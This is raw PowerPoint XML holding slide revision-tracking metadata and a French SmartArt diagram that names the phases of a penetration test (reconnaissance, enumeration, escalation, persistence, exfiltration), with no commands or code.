            <ac:cxnSpMk id="26" creationId="{BCA99B30-807D-5775-A541-5378634D0320}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T05:52:40.408" v="1577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4085483856" sldId="322"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod setBg">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T06:09:12.670" v="2726" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3697196551" sldId="323"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T06:07:45.770" v="2503" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3697196551" sldId="323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6:09:12.670" v="2726" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3697196551" sldId="323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8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T06:13:51.076" v="3447" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="414191525" sldId="324"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T06:12:46.769" v="3302" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="414191525" sldId="324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6:13:51.076" v="3447" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="414191525" sldId="324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8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T06:25:16.375" v="4070" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="54581810" sldId="325"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T06:14:04.133" v="3449" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="54581810" sldId="325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8D5B81ED-8E76-4482-8E5C-E2DDD97A2668}" dt="2022-10-19T06:25:16.375" v="4070" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="54581810" sldId="325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A72A294A-958A-623A-9DC7-0105928BA110}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Corentin BADOT-BERTRAND" userId="S::corentin.badotbertrand@vinci.be::27662e5d-0d19-4791-8099-d9c7e813972c" providerId="AD" clId="Web-{A72A294A-958A-623A-9DC7-0105928BA110}" dt="2022-10-19T10:34:57.654" v="57" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="S::corentin.badotbertrand@vinci.be::27662e5d-0d19-4791-8099-d9c7e813972c" providerId="AD" clId="Web-{A72A294A-958A-623A-9DC7-0105928BA110}" dt="2022-10-19T10:34:57.654" v="57" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="54581810" sldId="325"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin BADOT-BERTRAND" userId="S::corentin.badotbertrand@vinci.be::27662e5d-0d19-4791-8099-d9c7e813972c" providerId="AD" clId="Web-{A72A294A-958A-623A-9DC7-0105928BA110}" dt="2022-10-19T10:34:57.654" v="57" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="54581810" sldId="325"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF3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5B37-C6F0-4453-958E-AF3D47FD66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511833-83CE-4906-8764-B1083267E060}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" i="1" dirty="0"/>
            <a:t>Passive recon</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0"/>
            <a:t> &amp; OSINT</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EDEDC3AD-9778-42A4-BC58-0CA082831A81}" type="parTrans" cxnId="{9423CDC5-CDC8-485A-A2B2-34F16B2FF915}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{14EE340B-5445-4A3E-9A48-B34C51CACA89}" type="sibTrans" cxnId="{9423CDC5-CDC8-485A-A2B2-34F16B2FF915}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{50D55BF2-B541-4ECC-8FFF-1853A71613D5}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" i="1" dirty="0"/>
            <a:t>Active recon </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0"/>
            <a:t>(scans, …)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7AF13CE7-A909-4403-BE9F-AC392B20DDEF}" type="parTrans" cxnId="{A034618F-CBEF-4FA4-848A-B61F48E3CD20}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CE2E9863-ED1D-4C5A-B739-87D53C72965A}" type="sibTrans" cxnId="{A034618F-CBEF-4FA4-848A-B61F48E3CD20}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4AD63346-3325-49D8-AC62-EEAF3075A2E3}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0"/>
            <a:t>Première attaque</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5EFDB889-5AD7-47CC-BA29-BB9291388293}" type="parTrans" cxnId="{62E3458C-EEC5-427D-A88E-4397F8AC212A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AE2DC1BB-7A94-4C3F-A4FA-16AF63226F06}" type="sibTrans" cxnId="{62E3458C-EEC5-427D-A88E-4397F8AC212A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{01E70B0A-7D2F-4200-9BBA-F70DF68FA920}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0"/>
            <a:t>Enumération</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CE409ED1-E007-4081-8201-F9D066DCA2FB}" type="parTrans" cxnId="{D06A9EE0-0BF1-46FE-8528-CA85BE130C57}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{376393B9-91B7-4ABC-8167-A161674D0F43}" type="sibTrans" cxnId="{D06A9EE0-0BF1-46FE-8528-CA85BE130C57}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EAD13748-F2A2-44C9-A1CA-12C9095661CC}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0"/>
            <a:t>Escalade (H/V)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{331EA2E9-E164-4EAD-99E0-E6C5F245AB2C}" type="parTrans" cxnId="{CF352C86-FC5A-4C2B-AA54-AF01623C72A4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2C563006-2596-4B06-9A36-BD1795D17A1B}" type="sibTrans" cxnId="{CF352C86-FC5A-4C2B-AA54-AF01623C72A4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E670622D-B940-44AB-A584-BD521436D58E}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0"/>
            <a:t>Avancer</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{795A8319-D240-427F-9F43-960D92FD3049}" type="parTrans" cxnId="{F20EC054-76CA-4308-B456-D650853C69C6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4DE6438E-55D7-4DDA-A27F-AD60F255E89A}" type="sibTrans" cxnId="{F20EC054-76CA-4308-B456-D650853C69C6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{352966C0-677B-4026-921D-4F3EF8CC52A0}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0"/>
            <a:t>Persistance</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0B352ADA-40C1-4EA5-8898-F46FC1A64892}" type="parTrans" cxnId="{3E019471-6ED5-4F91-9192-DC889FB61393}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7C398D5-99BA-4BF0-AC7D-68E5AB02E4A4}" type="sibTrans" cxnId="{3E019471-6ED5-4F91-9192-DC889FB61393}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{53F04101-4E3A-478E-84E3-80527ED96112}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0"/>
            <a:t>Exfiltration</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60683846-060C-4054-AD88-AD8C681F488C}" type="parTrans" cxnId="{7DA9F1CB-BBF6-4306-8B98-363F47D7E204}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{647684B8-B0C7-414D-9F86-E837BE6451A2}" type="sibTrans" cxnId="{7DA9F1CB-BBF6-4306-8B98-363F47D7E204}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3C69186C-9523-46E1-8915-E28CF312593E}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0"/>
            <a:t>…</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{539CF2C5-1627-43A7-8F17-BF4F8D7E2EC4}" type="parTrans" cxnId="{3822B217-6385-4E34-8C7C-C6986DFA5950}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2B9C6607-3FAE-4A2F-9D23-F9DCE129661E}" type="sibTrans" cxnId="{3822B217-6385-4E34-8C7C-C6986DFA5950}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5E6170D8-BE88-465F-B751-46AB0D85F5E3}" type="pres">
      <dgm:prSet presAssocID="{B5405B37-C6F0-4453-958E-AF3D47FD66BC}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{46037D9B-9582-4793-88C2-3F447809F4C2}" type="pres">
      <dgm:prSet presAssocID="{64511833-83CE-4906-8764-B1083267E060}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B66A686F-6E1F-4C19-B782-07C3267B96E2}" type="pres">
      <dgm:prSet presAssocID="{14EE340B-5445-4A3E-9A48-B34C51CACA89}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4E785362-3CE0-418B-B864-ACACCF0B6A56}" type="pres">
      <dgm:prSet presAssocID="{14EE340B-5445-4A3E-9A48-B34C51CACA89}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{220DCE5E-7246-48D3-BB6B-97F43BEABF18}" type="pres">
      <dgm:prSet presAssocID="{50D55BF2-B541-4ECC-8FFF-1853A71613D5}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9A9BD6B7-952E-4B1A-8A7D-F13E678A1168}" type="pres">
      <dgm:prSet presAssocID="{CE2E9863-ED1D-4C5A-B739-87D53C72965A}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{90B0C776-E814-42FD-A080-0399072108DB}" type="pres">
      <dgm:prSet presAssocID="{CE2E9863-ED1D-4C5A-B739-87D53C72965A}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1580239C-2B49-456D-B44B-E55D4BFD850F}" type="pres">
      <dgm:prSet presAssocID="{4AD63346-3325-49D8-AC62-EEAF3075A2E3}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{727678E4-0D9F-46F7-88BF-23C314F3F21D}" type="pres">
      <dgm:prSet presAssocID="{AE2DC1BB-7A94-4C3F-A4FA-16AF63226F06}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D14108DE-BC13-4BA8-AEC9-92D48F218FC2}" type="pres">
      <dgm:prSet presAssocID="{AE2DC1BB-7A94-4C3F-A4FA-16AF63226F06}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D2DFB788-3044-4DA3-8534-26E8241AB92D}" type="pres">
      <dgm:prSet presAssocID="{E670622D-B940-44AB-A584-BD521436D58E}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4" custScaleY="173175">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{4FD61805-E025-47CC-ABF9-EE027ADB7D7A}" type="presOf" srcId="{CE2E9863-ED1D-4C5A-B739-87D53C72965A}" destId="{9A9BD6B7-952E-4B1A-8A7D-F13E678A1168}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{284F5E0B-FBFF-4676-8288-B000C2399D2C}" type="presOf" srcId="{CE2E9863-ED1D-4C5A-B739-87D53C72965A}" destId="{90B0C776-E814-42FD-A080-0399072108DB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{8961AD0D-E287-4F81-813F-9585DC96E54A}" type="presOf" srcId="{64511833-83CE-4906-8764-B1083267E060}" destId="{46037D9B-9582-4793-88C2-3F447809F4C2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{3822B217-6385-4E34-8C7C-C6986DFA5950}" srcId="{E670622D-B940-44AB-A584-BD521436D58E}" destId="{3C69186C-9523-46E1-8915-E28CF312593E}" srcOrd="4" destOrd="0" parTransId="{539CF2C5-1627-43A7-8F17-BF4F8D7E2EC4}" sibTransId="{2B9C6607-3FAE-4A2F-9D23-F9DCE129661E}"/>
    <dgm:cxn modelId="{54F0341F-3541-4B72-9771-149AB7BAD209}" type="presOf" srcId="{B5405B37-C6F0-4453-958E-AF3D47FD66BC}" destId="{5E6170D8-BE88-465F-B751-46AB0D85F5E3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{B89F5A20-32F5-4418-81EF-CD5063110E36}" type="presOf" srcId="{50D55BF2-B541-4ECC-8FFF-1853A71613D5}" destId="{220DCE5E-7246-48D3-BB6B-97F43BEABF18}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{C7ED872E-2E27-4F3E-AFA1-6648E0FD7E68}" type="presOf" srcId="{14EE340B-5445-4A3E-9A48-B34C51CACA89}" destId="{4E785362-3CE0-418B-B864-ACACCF0B6A56}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{C02E933E-CD3B-4961-B775-6EE63E5A2975}" type="presOf" srcId="{3C69186C-9523-46E1-8915-E28CF312593E}" destId="{D2DFB788-3044-4DA3-8534-26E8241AB92D}" srcOrd="0" destOrd="5" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{21A1BF5B-CE91-48AD-95A1-86A905979596}" type="presOf" srcId="{14EE340B-5445-4A3E-9A48-B34C51CACA89}" destId="{B66A686F-6E1F-4C19-B782-07C3267B96E2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{2AAB975E-6B95-43FE-977E-95ACA4A9574E}" type="presOf" srcId="{AE2DC1BB-7A94-4C3F-A4FA-16AF63226F06}" destId="{D14108DE-BC13-4BA8-AEC9-92D48F218FC2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{E6233867-8C4C-447A-BE0B-0DC16525414F}" type="presOf" srcId="{E670622D-B940-44AB-A584-BD521436D58E}" destId="{D2DFB788-3044-4DA3-8534-26E8241AB92D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{592D4A6A-92D6-4672-BC89-F4752E2366AB}" type="presOf" srcId="{AE2DC1BB-7A94-4C3F-A4FA-16AF63226F06}" destId="{727678E4-0D9F-46F7-88BF-23C314F3F21D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{7FB2C86B-E858-401E-B636-9919CC9A0DA9}" type="presOf" srcId="{EAD13748-F2A2-44C9-A1CA-12C9095661CC}" destId="{D2DFB788-3044-4DA3-8534-26E8241AB92D}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{3E019471-6ED5-4F91-9192-DC889FB61393}" srcId="{E670622D-B940-44AB-A584-BD521436D58E}" destId="{352966C0-677B-4026-921D-4F3EF8CC52A0}" srcOrd="2" destOrd="0" parTransId="{0B352ADA-40C1-4EA5-8898-F46FC1A64892}" sibTransId="{E7C398D5-99BA-4BF0-AC7D-68E5AB02E4A4}"/>
    <dgm:cxn modelId="{F20EC054-76CA-4308-B456-D650853C69C6}" srcId="{B5405B37-C6F0-4453-958E-AF3D47FD66BC}" destId="{E670622D-B940-44AB-A584-BD521436D58E}" srcOrd="3" destOrd="0" parTransId="{795A8319-D240-427F-9F43-960D92FD3049}" sibTransId="{4DE6438E-55D7-4DDA-A27F-AD60F255E89A}"/>
    <dgm:cxn modelId="{056FD484-66F1-4029-958C-DAA5DB0522CB}" type="presOf" srcId="{53F04101-4E3A-478E-84E3-80527ED96112}" destId="{D2DFB788-3044-4DA3-8534-26E8241AB92D}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{E17D1F85-943E-4C8D-A205-2D93EAF52799}" type="presOf" srcId="{01E70B0A-7D2F-4200-9BBA-F70DF68FA920}" destId="{D2DFB788-3044-4DA3-8534-26E8241AB92D}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{CF352C86-FC5A-4C2B-AA54-AF01623C72A4}" srcId="{E670622D-B940-44AB-A584-BD521436D58E}" destId="{EAD13748-F2A2-44C9-A1CA-12C9095661CC}" srcOrd="1" destOrd="0" parTransId="{331EA2E9-E164-4EAD-99E0-E6C5F245AB2C}" sibTransId="{2C563006-2596-4B06-9A36-BD1795D17A1B}"/>
    <dgm:cxn modelId="{62E3458C-EEC5-427D-A88E-4397F8AC212A}" srcId="{B5405B37-C6F0-4453-958E-AF3D47FD66BC}" destId="{4AD63346-3325-49D8-AC62-EEAF3075A2E3}" srcOrd="2" destOrd="0" parTransId="{5EFDB889-5AD7-47CC-BA29-BB9291388293}" sibTransId="{AE2DC1BB-7A94-4C3F-A4FA-16AF63226F06}"/>
    <dgm:cxn modelId="{A034618F-CBEF-4FA4-848A-B61F48E3CD20}" srcId="{B5405B37-C6F0-4453-958E-AF3D47FD66BC}" destId="{50D55BF2-B541-4ECC-8FFF-1853A71613D5}" srcOrd="1" destOrd="0" parTransId="{7AF13CE7-A909-4403-BE9F-AC392B20DDEF}" sibTransId="{CE2E9863-ED1D-4C5A-B739-87D53C72965A}"/>
    <dgm:cxn modelId="{81DACCA6-9F35-4B9C-8D4F-8DCA85730BC6}" type="presOf" srcId="{4AD63346-3325-49D8-AC62-EEAF3075A2E3}" destId="{1580239C-2B49-456D-B44B-E55D4BFD850F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{9423CDC5-CDC8-485A-A2B2-34F16B2FF915}" srcId="{B5405B37-C6F0-4453-958E-AF3D47FD66BC}" destId="{64511833-83CE-4906-8764-B1083267E060}" srcOrd="0" destOrd="0" parTransId="{EDEDC3AD-9778-42A4-BC58-0CA082831A81}" sibTransId="{14EE340B-5445-4A3E-9A48-B34C51CACA89}"/>
    <dgm:cxn modelId="{C6337AC6-7F88-4CA7-969D-B75486DCC426}" type="presOf" srcId="{352966C0-677B-4026-921D-4F3EF8CC52A0}" destId="{D2DFB788-3044-4DA3-8534-26E8241AB92D}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{7DA9F1CB-BBF6-4306-8B98-363F47D7E204}" srcId="{E670622D-B940-44AB-A584-BD521436D58E}" destId="{53F04101-4E3A-478E-84E3-80527ED96112}" srcOrd="3" destOrd="0" parTransId="{60683846-060C-4054-AD88-AD8C681F488C}" sibTransId="{647684B8-B0C7-414D-9F86-E837BE6451A2}"/>
    <dgm:cxn modelId="{D06A9EE0-0BF1-46FE-8528-CA85BE130C57}" srcId="{E670622D-B940-44AB-A584-BD521436D58E}" destId="{01E70B0A-7D2F-4200-9BBA-F70DF68FA920}" srcOrd="0" destOrd="0" parTransId="{CE409ED1-E007-4081-8201-F9D066DCA2FB}" sibTransId="{376393B9-91B7-4ABC-8167-A161674D0F43}"/>
    <dgm:cxn modelId="{72F1D9D9-48E6-4643-A042-E7054AD005D5}" type="presParOf" srcId="{5E6170D8-BE88-465F-B751-46AB0D85F5E3}" destId="{46037D9B-9582-4793-88C2-3F447809F4C2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{A849B247-88B5-4523-B11C-34D33555562A}" type="presParOf" srcId="{5E6170D8-BE88-465F-B751-46AB0D85F5E3}" destId="{B66A686F-6E1F-4C19-B782-07C3267B96E2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{37D0D1A6-6686-4246-AA1F-506276BD39DA}" type="presParOf" srcId="{B66A686F-6E1F-4C19-B782-07C3267B96E2}" destId="{4E785362-3CE0-418B-B864-ACACCF0B6A56}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{A0510503-70B2-4EF0-91B9-06B1E91BE747}" type="presParOf" srcId="{5E6170D8-BE88-465F-B751-46AB0D85F5E3}" destId="{220DCE5E-7246-48D3-BB6B-97F43BEABF18}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{08815FA1-82DA-4E61-A159-8864663554BD}" type="presParOf" srcId="{5E6170D8-BE88-465F-B751-46AB0D85F5E3}" destId="{9A9BD6B7-952E-4B1A-8A7D-F13E678A1168}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
